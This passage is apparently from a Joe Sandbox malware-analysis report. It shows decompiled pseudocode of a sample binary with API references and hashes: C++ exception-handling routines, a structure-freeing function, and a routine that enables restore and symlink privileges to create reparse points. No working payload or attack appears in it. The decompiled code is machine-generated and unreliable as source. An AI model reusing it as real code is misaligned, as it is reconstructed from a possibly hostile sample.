																						E00A52DB1(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																						_t332 = _t332 + 0x30;
																					}
																					L43:
																					_t296 = _v16;
																					goto L44;
																					L40:
																					_t294 = _t294 + 1;
																					_t253 = _t253 + 0x10;
																					_v20 = _t294;
																					_v24 = _t253;
																					__eflags = _t294 - _v92;
																				} while (_t294 != _v92);
																				goto L43;
																			}
																		}
																	}
																	L44:
																	_t296 = _t296 + 1;
																	_t247 = _v44;
																	_t290 = _v32 + 0x14;
																	_v16 = _t296;
																	_v32 = _t290;
																	__eflags = _t296 - _v56;
																} while (_t296 < _v56);
																_t301 = _a20;
																_t315 = _a32;
															}
														}
														__eflags = _a24;
														if(__eflags != 0) {
															_push(1);
															E00A50150(_t270, _t301, _t315, __eflags);
															_t275 = _t270;
														}
														__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
														if(__eflags < 0) {
															L60:
															_t224 = E00A52AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
															__eflags =  *(_t224 + 0x1c);
															if( *(_t224 + 0x1c) != 0) {
																goto L67;
															} else {
																goto L61;
															}
														} else {
															_t228 = _t301[8] >> 2;
															__eflags = _t301[7];
															if(_t301[7] != 0) {
																__eflags = _t228 & 0x00000001;
																if(__eflags == 0) {
																	_push(_t301[7]);
																	_t229 = E00A5384A(_t270, _t301, _t315, _t270);
																	_pop(_t275);
																	__eflags = _t229;
																	if(__eflags == 0) {
																		goto L64;
																	} else {
																		goto L60;
																	}
																} else {
																	goto L54;
																}
															} else {
																__eflags = _t228 & 0x00000001;
																if(__eflags == 0) {
																	goto L60;
																} else {
																	__eflags = _a28;
																	if(__eflags != 0) {
																		goto L60;
																	} else {
																		L54:
																		 *(E00A52AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
																		_t237 = E00A52AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
																		_t286 = _v8;
																		 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																		goto L62;
																	}
																}
															}
														}
													} else {
														__eflags = _t270[0x14] - 0x19930521;
														if(_t270[0x14] == 0x19930521) {
															goto L29;
														} else {
															__eflags = _t270[0x14] - 0x19930522;
															if(_t270[0x14] != 0x19930522) {
																goto L57;
															} else {
																goto L29;
															}
														}
													}
												}
											}
										} else {
											_v16 =  *((intOrPtr*)(E00A52AEC(_t270, _t275, _t296, _t301, _t315, _t351) + 0x1c));
											_t264 = E00A52AEC(_t270, _t275, _t296, _t301, _t315, _t351);
											_push(_v16);
											 *(_t264 + 0x1c) = _t315;
											_t265 = E00A5384A(_t270, _t301, _t315, _t270);
											_pop(_t286);
											if(_t265 != 0) {
												goto L23;
											} else {
												_t301 = _v16;
												_t353 =  *_t301 - _t315;
												if( *_t301 <= _t315) {
													L62:
													E00A57AF4(_t270, _t286, _t296, _t301, _t315, __eflags);
												} else {
													while(1) {
														_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
														if(E00A534D3( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0xa6efb4) != 0) {
															goto L63;
														}
														_t315 = _t315 + 0x10;
														_t269 = _v20 + 1;
														_v20 = _t269;
														_t353 = _t269 -  *_t301;
														if(_t269 >=  *_t301) {
															goto L62;
														} else {
															continue;
														}
														goto L63;
													}
												}
												L63:
												_push(1);
												_push(_t270);
												E00A50150(_t270, _t301, _t315, __eflags);
												_t275 =  &_v64;
												E00A534BB( &_v64);
												E00A5238D( &_v64, 0xa6c284);
												L64:
												 *(E00A52AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
												_t231 = E00A52AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
												_t275 = _v8;
												 *(_t231 + 0x14) = _v8;
												__eflags = _t315;
												if(_t315 == 0) {
													_t315 = _a8;
												}
												E00A50A87(_t275, _t315, _t270);
												E00A5374A(_a8, _a16, _t301);
												_t234 = E00A53907(_t301);
												_t332 = _t332 + 0x10;
												_push(_t234);
												E00A536C1(_t270, _t275, _t296, _t301, _t315, __eflags);
												goto L67;
											}
										}
									} else {
										_t350 = _t270[0x1c] - _t315;
										if(_t270[0x1c] == _t315) {
											goto L67;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
				}
			}

0x00a52e31
0x00a52e38
0x00a52e3a
0x00a52e43
0x00a52e49
0x00a52e51
0x00a52e53
0x00a52e56
0x00a52e5c
0x00a531d0
0x00a531d0
0x00a531d5
0x00a531d7
0x00a531d9
0x00a531dc
0x00a531dd
0x00a531e0
0x00a531e6
0x00a53305
0x00a531ec
0x00a531ec
0x00a531ed
0x00a531ee
0x00a531f5
0x00a531f8
0x00a531fb
0x00a53201
0x00a53203
0x00a53208
0x00a5320b
0x00a5320d
0x00a53213
0x00a53215
0x00a5321b
0x00a53230
0x00a53235
0x00a53238
0x00a5323a
0x00a53301
0x00000000
0x00a53302
0x00a5323a
0x00a5321b
0x00a53213
0x00a5320b
0x00a53240
0x00a53243
0x00a53246
0x00a53249
0x00a5324c
0x00a53252
0x00a53264
0x00a53269
0x00a5326c
0x00a5326f
0x00a53272
0x00a53275
0x00a53278
0x00a5327b
0x00000000
0x00000000
0x00a53281
0x00a53281
0x00a53284
0x00a53287
0x00a53296
0x00a53297
0x00a53297
0x00a53299
0x00a5329c
0x00000000
0x00000000
0x00a5329e
0x00a532a1
0x00000000
0x00000000
0x00a532af
0x00a532b1
0x00a532b4
0x00a532b6
0x00a532be
0x00a532be
0x00a532c1
0x00a532c3
0x00a532c5
0x00a532e1
0x00a532e6
0x00a532e9
0x00a532e9
0x00000000
0x00a532c1
0x00a532b8
0x00a532bc
0x00000000
0x00000000
0x00000000
0x00a532ec
0x00a532ef
0x00a532f0
0x00a532f3
0x00a532f6
0x00a532f9
0x00a532fc
0x00a532fc
0x00000000
0x00a53287
0x00a53306
0x00a5330b
0x00a5330c
0x00a5330f
0x00a53312
0x00a53313
0x00a53314
0x00a53315
0x00a53318
0x00a5331a
0x00a53392
0x00a53394
0x00a53394
0x00a5331c
0x00a5331c
0x00a5331f
0x00a53322
0x00000000
0x00a53324
0x00a53324
0x00a53327
0x00a5332a
0x00a53331
0x00a53331
0x00a53334
0x00a53336
0x00a53338
0x00a5336a
0x00a5336a
0x00a5336d
0x00a53374
0x00a53374
0x00a53377
0x00a5337a
0x00a53381
0x00a53381
0x00a53384
0x00a5338b
0x00a5338d
0x00a5338d
0x00a53386
0x00a53386
0x00a53389
0x00000000
0x00000000
0x00a53389
0x00a5337c
0x00a5337c
0x00a5337f
0x00000000
0x00000000
0x00a5337f
0x00a5336f
0x00a5336f
0x00a53372
0x00000000
0x00000000
0x00a53372
0x00a5338e
0x00a5333a
0x00a5333a
0x00a5333a
0x00a5333d
0x00a5333d
0x00a5333f
0x00a53341
0x00000000
0x00000000
0x00a53343
0x00a53345
0x00a53359
0x00a53359
0x00a53347
0x00a53347
0x00a5334a
0x00a5334d
0x00000000
0x00a5334f
0x00a5334f
0x00a53352
0x00a53355
0x00a53357
0x00000000
0x00000000
0x00000000
0x00000000
0x00a53357
0x00a5334d
0x00a53362
0x00a53362
0x00a53364
0x00000000
0x00a53366
0x00a53366
0x00a53366
0x00000000
0x00a53364
0x00a5335d
0x00a5335f
0x00a5335f
0x00000000
0x00a5335f
0x00a5332c
0x00a5332c
0x00a5332f
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5332f
0x00a5332a
0x00a53322
0x00a53395
0x00a53399
0x00a53399
0x00a52e6b
0x00a52e6b
0x00a52e74
0x00a52f71
0x00a52f71
0x00a52f74
0x00000000
0x00a52ea3
0x00a52ea3
0x00a52ea5
0x00a52ea8
0x00000000
0x00a52eae
0x00a52eae
0x00a52eb3
0x00a52eb6
0x00a5316a
0x00a5316e
0x00a52ebc
0x00a52ec1
0x00a52ec4
0x00a52ec9
0x00a52ed0
0x00a52ed5
0x00000000
0x00a52edb
0x00a52ee1
0x00a52f0d
0x00a52f0d
0x00a52f12
0x00a52f15
0x00a52f79
0x00a52f79
0x00a52f7c
0x00a52f7f
0x00a52f81
0x00a52f84
0x00a52f87
0x00a52f8d
0x00a53139
0x00a53139
0x00a5313c
0x00000000
0x00a5313e
0x00a5313e
0x00a53141
0x00000000
0x00a53147
0x00a53147
0x00a5314a
0x00a5314d
0x00a5314e
0x00a5314f
0x00a53152
0x00a53153
0x00a53156
0x00a53157
0x00a5315c
0x00000000
0x00a5315c
0x00a53141
0x00a52f93
0x00a52f93
0x00a52f97
0x00000000
0x00a52f9d
0x00a52f9d
0x00a52fa4
0x00a52fbc
0x00a52fbc
0x00a52fbf
0x00a52fc2
0x00a52fc8
0x00a52fd8
0x00a52fdd
0x00a52fe0
0x00a52fe3
0x00a52fe6
0x00a52fe9
0x00a52fec
0x00a52fef
0x00a52ff5
0x00a52ff5
0x00a52ff8
0x00a52ffb
0x00a5300a
0x00a5300b
0x00a5300b
0x00a5300d
0x00a53010
0x00a53016
0x00a53019
0x00a5301f
0x00a53021
0x00a53024
0x00a53027
0x00a5302d
0x00a53030
0x00a53035
0x00a53035
0x00a53038
0x00a5303b
0x00a5303e
0x00a53041
0x00a53044
0x00a53049
0x00a5304a
0x00a5304b
0x00a5304c
0x00a5304d
0x00a53050
0x00a53053
0x00a53055
0x00000000
0x00a53057
0x00a53057
0x00a53057
0x00a53058
0x00a5305a
0x00a5305d
0x00a5305e
0x00a53063
0x00a53066
0x00a53068
0x00000000
0x00000000
0x00a5306a
0x00a5306d
0x00a5306e
0x00a53071
0x00a53073
0x00000000
0x00a53075
0x00a53075
0x00a53078
0x00000000
0x00a53078
0x00000000
0x00a53073
0x00a5308c
0x00a53092
0x00a530af
0x00a530b4
0x00a530b4
0x00a530b7
0x00a530b7
0x00000000
0x00a5307b
0x00a5307b
0x00a5307c
0x00a5307f
0x00a53082
0x00a53085
0x00a53085
0x00000000
0x00a5308a
0x00a53027
0x00a53019
0x00a530ba
0x00a530bd
0x00a530be
0x00a530c1
0x00a530c4
0x00a530c7
0x00a530ca
0x00a530ca
0x00a530d3
0x00a530d6
0x00a530d6
0x00a52fef
0x00a530d9
0x00a530dd
0x00a530df
0x00a530e2
0x00a530e8
0x00a530e8
0x00a530f0
0x00a530f5
0x00a5315f
0x00a5315f
0x00a53164
0x00a53168
0x00000000
0x00000000
0x00000000
0x00000000
0x00a530f7
0x00a530fa
0x00a530fd
0x00a53101
0x00a5310f
0x00a53111
0x00a53128
0x00a5312c
0x00a53132
0x00a53133
0x00a53135
0x00000000
0x00a53137
0x00000000
0x00a53137
0x00000000
0x00000000
0x00000000
0x00a53103
0x00a53103
0x00a53105
0x00000000
0x00a53107
0x00a53107
0x00a5310b
0x00000000
0x00a5310d
0x00a53113
0x00a53118
0x00a5311b
0x00a53120
0x00a53123
0x00000000
0x00a53123
0x00a5310b
0x00a53105
0x00a53101
0x00a52fa6
0x00a52fa6
0x00a52fad
0x00000000
0x00a52faf
0x00a52faf
0x00a52fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a52fb6
0x00a52fad
0x00a52fa4
0x00a52f97
0x00a52f17
0x00a52f1f
0x00a52f22
0x00a52f27
0x00a52f2b
0x00a52f2e
0x00a52f34
0x00a52f37
0x00000000
0x00a52f39
0x00a52f39
0x00a52f3c
0x00a52f3e
0x00a5316f
0x00a5316f
0x00000000
0x00a52f44
0x00a52f4c
0x00a52f57
0x00000000
0x00000000
0x00a52f60
0x00a52f63
0x00a52f64
0x00a52f67
0x00a52f69
0x00000000
0x00a52f6f
0x00000000
0x00a52f6f
0x00000000
0x00a52f69
0x00a52f44
0x00a53174
0x00a53174
0x00a53176
0x00a53177
0x00a5317e
0x00a53181
0x00a5318f
0x00a53194
0x00a53199
0x00a5319c
0x00a531a1
0x00a531a4
0x00a531a7
0x00a531a9
0x00a531ab
0x00a531ab
0x00a531b0
0x00a531bc
0x00a531c2
0x00a531c7
0x00a531ca
0x00a531cb
0x00000000
0x00a531cb
0x00a52f37
0x00a52f04
0x00a52f04
0x00a52f07
0x00000000
0x00000000
0x00000000
0x00000000
0x00a52f07
0x00a52ee1
0x00a52ed5
0x00a52eb6
0x00a52ea8
0x00a52e74

APIs

type_info::operator==.LIBVCRUNTIME ref: 00A52F50
___TypeMatch.LIBVCRUNTIME ref: 00A5305E
CatchIt.LIBVCRUNTIME ref: 00A530AF
_UnwindNestedFrames.LIBCMT ref: 00A531B0
CallUnexpected.LIBVCRUNTIME ref: 00A531CB
_abort.LIBCMT ref: 00A531D0

Strings

csm, xrefs: 00A52F87
csm, xrefs: 00A52EDB
csm, xrefs: 00A52E6E

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 445410325-393685449
Opcode ID: acf91f123fd8aed87abd5d4de9de06b636a5949674e365da3c6d7d1f502ff8ca
Instruction ID: 6cb8f6aea4e8dfe370035f0608e31eb8df846817e68ca1348312d347daeb0aef
Opcode Fuzzy Hash: acf91f123fd8aed87abd5d4de9de06b636a5949674e365da3c6d7d1f502ff8ca
Instruction Fuzzy Hash: AFB1A972800209EFCF29DFA4D981AAEBBB5FF55352F14455AEC016B202C731DA29CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A596F1 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A596F1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xa66430) {
					E00A58DCC(_t52);
					_t26 = _a4;
				}
				E00A58DCC( *((intOrPtr*)(_t26 + 0x3c)));
				E00A58DCC( *((intOrPtr*)(_a4 + 0x30)));
				E00A58DCC( *((intOrPtr*)(_a4 + 0x34)));
				E00A58DCC( *((intOrPtr*)(_a4 + 0x38)));
				E00A58DCC( *((intOrPtr*)(_a4 + 0x28)));
				E00A58DCC( *((intOrPtr*)(_a4 + 0x2c)));
				E00A58DCC( *((intOrPtr*)(_a4 + 0x40)));
				E00A58DCC( *((intOrPtr*)(_a4 + 0x44)));
				E00A58DCC( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00A595A9(5,  &_v8);
				_v8 =  &_a4;
				return E00A595F9(4,  &_v8);
			}

0x00a596f7
0x00a596fa
0x00a59702
0x00a59705
0x00a5970a
0x00a5970d
0x00a59711
0x00a5971c
0x00a59727
0x00a59732
0x00a5973d
0x00a59748
0x00a59753
0x00a5975e
0x00a5976c
0x00a59774
0x00a5977d
0x00a59785
0x00a59799

APIs

_free.LIBCMT ref: 00A59705

Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4

_free.LIBCMT ref: 00A59711
_free.LIBCMT ref: 00A5971C
_free.LIBCMT ref: 00A59727
_free.LIBCMT ref: 00A59732
_free.LIBCMT ref: 00A5973D
_free.LIBCMT ref: 00A59748
_free.LIBCMT ref: 00A59753
_free.LIBCMT ref: 00A5975E
_free.LIBCMT ref: 00A5976C

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 44b43e25231cbe3882d293f00b536e7775d9110452bc9ef6ef6c51ea2a5dd4cd
Instruction ID: c5d9552824a1001cbd76625af26117b0c7b9725f00cf71b12cebdf61b86868bd
Opcode Fuzzy Hash: 44b43e25231cbe3882d293f00b536e7775d9110452bc9ef6ef6c51ea2a5dd4cd
Instruction Fuzzy Hash: 7B11A27611010DAFCB01EF94CA82CDD3BB5FF18351B5154A1FE089F262DE36EA589B84

Uniqueness

Uniqueness Score: -1.00%

Function 00A36FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A36FA5(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t109;
				signed int _t112;
				intOrPtr _t117;
				signed int _t134;
				long _t154;
				void* _t182;
				void* _t186;
				void* _t190;
				void* _t194;
				short _t195;
				void* _t199;
				WCHAR* _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t229;
				intOrPtr* _t233;
				intOrPtr* _t234;
				void* _t236;
				intOrPtr _t237;
				signed int _t238;
				void* _t239;
				intOrPtr _t240;
				signed int _t242;
				intOrPtr _t244;
				short _t245;
				void* _t246;
				intOrPtr _t250;
				short _t252;
				void* _t253;
				void* _t255;
				void* _t256;

				E00A4EB78(0xa6279e, _t253);
				E00A4EC50(0x30a8);
				if( *0xa71023 == 0) {
					E00A37A9C(L"SeRestorePrivilege");
					E00A37A9C(L"SeCreateSymbolicLinkPrivilege");
					 *0xa71023 = 1;
				}
				_t203 = _t253 - 0x2c;
				E00A313BA(_t203, 0x1418);
				_t244 =  *((intOrPtr*)(_t253 + 0x10));
				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
				E00A40602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
				 *(_t253 - 0x14) = E00A53E13(_t253 - 0x107c);
				_t236 = _t253 - 0x107c;
				_t199 = _t253 - 0x207c;
				_t109 = E00A56088(_t236, L"\\??\\", 4);
				_t256 = _t255 + 0x10;
				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
				 *(_t253 - 0xd) = _t204;
				if(_t109 == 0) {
					_t236 = _t253 - 0x1074;
				}
				if(_t204 != 0) {
					_t194 = E00A56088(_t236, L"UNC\\", 4);
					_t256 = _t256 + 0xc;
					if(_t194 == 0) {
						_t195 = 0x5c;
						 *((short*)(_t253 - 0x207c)) = _t195;
						_t199 = _t253 - 0x207a;
						_t236 = _t236 + 6;
					}
				}
				E00A56066(_t199, _t236);
				_t112 = E00A53E13(_t253 - 0x207c);
				_t237 =  *((intOrPtr*)(_t253 + 8));
				_t200 =  *(_t253 + 0xc);
				 *(_t253 - 0x18) = _t112;
				if( *((char*)(_t237 + 0x7197)) != 0) {
					L12:
					E00A3A0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
					if(E00A3A231(_t200) != 0) {
						_t186 = E00A3A28F(E00A3A243(_t200));
						_push(_t200);
						if(_t186 == 0) {
							E00A3A1E0();
						} else {
							E00A3A18F();
						}
					}
					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
						__eflags = CreateDirectoryW(_t200, 0);
						if(__eflags != 0) {
							goto L21;
						}
						_t201 = 0;
						E00A32021(__eflags, 0x14, 0, _t200);
						E00A36D83(0xa71098, 9);
						goto L42;
					} else {
						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 != 0xffffffff) {
							CloseHandle(_t182);
							L21:
							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
							__eflags = _t117 - 3;
							if(_t117 != 3) {
								__eflags = _t117 - 2;
								if(_t117 == 2) {
									L27:
									_t233 =  *(_t253 - 0x2c);
									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
									 *_t233 = 0xa000000c;
									_t245 = _t205 + _t205;
									 *((short*)(_t233 + 0xa)) = _t245;
									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
									 *((intOrPtr*)(_t233 + 6)) = 0;
									E00A56066(_t233 + 0x14, _t253 - 0x107c);
									_t246 =  *(_t253 - 0x2c);
									 *((short*)(_t246 + 0xc)) = _t245 + 2;
									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
									E00A56066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
									__eflags = _t134;
									 *(_t246 + 0x10) = _t134;
									L28:
									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
									__eflags = _t239 - 0xffffffff;
									if(_t239 != 0xffffffff) {
										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
										if(__eflags != 0) {
											E00A39556(_t253 - 0x30b4);
											 *(_t253 - 4) = 1;
											E00A37A7B(_t253 - 0x30b4, _t239);
											_t240 =  *((intOrPtr*)(_t253 + 8));
											_t247 =  *((intOrPtr*)(_t253 + 0x10));
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											E00A39DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
											E00A39620(_t253 - 0x30b4);
											__eflags =  *((char*)(_t240 + 0x71a8));
											if( *((char*)(_t240 + 0x71a8)) == 0) {
												E00A3A4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
											}
											_t201 = 1;
											E00A3959A(_t253 - 0x30b4);
											goto L42;
										}
										CloseHandle(_t239);
										E00A32021(__eflags, 0x15, 0, _t200);
										_t154 = GetLastError();
										__eflags = _t154 - 5;
										if(_t154 == 5) {
											L33:
											__eflags = E00A407BC();
											if(__eflags == 0) {
												E00A315C6(_t253 - 0x7c, 0x18);
												E00A415FE(_t253 - 0x7c);
											}
											L35:
											E00A36DCB(0xa71098, __eflags);
											E00A36D83(0xa71098, 9);
											_t250 =  *((intOrPtr*)(_t253 + 0x10));
											_push(_t200);
											__eflags =  *((char*)(_t250 + 0x10f1));
											if( *((char*)(_t250 + 0x10f1)) == 0) {
												DeleteFileW();
											} else {
												RemoveDirectoryW();
											}
											goto L38;
										}
										__eflags = _t154 - 0x522;
										if(__eflags != 0) {
											goto L35;
										}
										goto L33;
									}
									E00A36C23(_t200);
									E00A36D83(0xa71098, 9);
									goto L38;
								}
								__eflags = _t117 - 1;
								if(_t117 != 1) {
									goto L38;
								}
								goto L27;
							}
							_t234 =  *(_t253 - 0x2c);
							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
							 *_t234 = 0xa0000003;
							_t252 = _t229 + _t229;
							 *((short*)(_t234 + 0xa)) = _t252;
							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
							 *((intOrPtr*)(_t234 + 6)) = 0;
							E00A56066(_t234 + 0x10, _t253 - 0x107c);
							_t246 =  *(_t253 - 0x2c);
							 *((short*)(_t246 + 0xc)) = _t252 + 2;
							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
							E00A56066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
							goto L28;
						}
						E00A36C23(_t200);
						goto L38;
					}
				} else {
					if( *(_t253 - 0xd) != 0) {
						L38:
						_t201 = 0;
						L42:
						E00A315FB(_t253 - 0x2c);
						 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
						return _t201;
					}
					_t190 = E00A3BCC3(_t244 + 0x1104);
					_t269 = _t190;
					if(_t190 != 0) {
						goto L38;
					}
					_push(_t244 + 0x1104);
					_push(_t200);
					_push(_t244 + 0x28);
					_push(_t237);
					if(E00A37861(_t269) == 0) {
						goto L38;
					}
					goto L12;
				}
			}

0x00a36faa
0x00a36fb4
0x00a36fc0
0x00a36fc7
0x00a36fd1
0x00a36fd6
0x00a36fd6
0x00a36fe5
0x00a36fe8
0x00a36fed
0x00a36ff0
0x00a37007
0x00a3701a
0x00a3701d
0x00a37025
0x00a37031
0x00a37036
0x00a3703b
0x00a3703e
0x00a37043
0x00a37045
0x00a37045
0x00a3704d
0x00a37057
0x00a3705c
0x00a37061
0x00a37065
0x00a37066
0x00a3706d
0x00a37073
0x00a37073
0x00a37061
0x00a37078
0x00a37084
0x00a37089
0x00a3708f
0x00a37092
0x00a3709c
0x00a370d6
0x00a370e1
0x00a370ee
0x00a370f7
0x00a370fc
0x00a370ff
0x00a37108
0x00a37101
0x00a37101
0x00a37101
0x00a370ff
0x00a37114
0x00a371e1
0x00a371e3
0x00000000
0x00000000
0x00a371ea
0x00a371ef
0x00a371fb
0x00000000
0x00a37127
0x00a37139
0x00a37142
0x00a37155
0x00a3715b
0x00a3715b
0x00a37161
0x00a37164
0x00a37205
0x00a37208
0x00a37213
0x00a37216
0x00a37219
0x00a3721f
0x00a37222
0x00a37228
0x00a3722b
0x00a37239
0x00a3723f
0x00a3724d
0x00a37255
0x00a37258
0x00a3725f
0x00a37274
0x00a37280
0x00a37280
0x00a37283
0x00a37286
0x00a3729e
0x00a372a0
0x00a372a3
0x00a372de
0x00a372e0
0x00a3735d
0x00a37369
0x00a3736d
0x00a37372
0x00a37375
0x00a37386
0x00a37399
0x00a373ac
0x00a373b7
0x00a373c2
0x00a373c7
0x00a373ce
0x00a373d4
0x00a373d4
0x00a373df
0x00a373e1
0x00000000
0x00a373e1
0x00a372e3
0x00a372ee
0x00a372f3
0x00a372f9
0x00a372fc
0x00a37305
0x00a3730a
0x00a3730c
0x00a37313
0x00a3731b
0x00a3731b
0x00a37320
0x00a37327
0x00a37330
0x00a37335
0x00a37338
0x00a37339
0x00a37340
0x00a3734a
0x00a37342
0x00a37342
0x00a37342
0x00000000
0x00a37340
0x00a372fe
0x00a37303
0x00000000
0x00000000
0x00000000
0x00a37303
0x00a372ad
0x00a372b6
0x00000000
0x00a372b6
0x00a3720a
0x00a3720d
0x00000000
0x00000000
0x00000000
0x00a3720d
0x00a3716d
0x00a37170
0x00a37176
0x00a37179
0x00a3717f
0x00a37182
0x00a37190
0x00a37196
0x00a371a4
0x00a371ac
0x00a371af
0x00a371b6
0x00a371cb
0x00000000
0x00a371d0
0x00a3714a
0x00000000
0x00a3714a
0x00a3709e
0x00a370a2
0x00a37350
0x00a37350
0x00a373e6
0x00a373e9
0x00a373f6
0x00a373fe
0x00a373fe
0x00a370af
0x00a370b4
0x00a370b6
0x00000000
0x00000000
0x00a370c2
0x00a370c3
0x00a370c7
0x00a370c8
0x00a370d0
0x00000000
0x00000000
0x00000000
0x00a370d0

APIs

__EH_prolog.LIBCMT ref: 00A36FAA
_wcslen.LIBCMT ref: 00A37013
_wcslen.LIBCMT ref: 00A37084

Part of subcall function 00A37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A37AAB
Part of subcall function 00A37A9C: GetLastError.KERNEL32 ref: 00A37AF1
Part of subcall function 00A37A9C: CloseHandle.KERNEL32(?), ref: 00A37B00

Strings

SeRestorePrivilege, xrefs: 00A36FC2
UNC\, xrefs: 00A37051
SeCreateSymbolicLinkPrivilege, xrefs: 00A36FCC
\??\, xrefs: 00A3702B

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 7456f86d3bcaeea58f6eef6c6329cc9127fbdced033eba880951282137553ca7
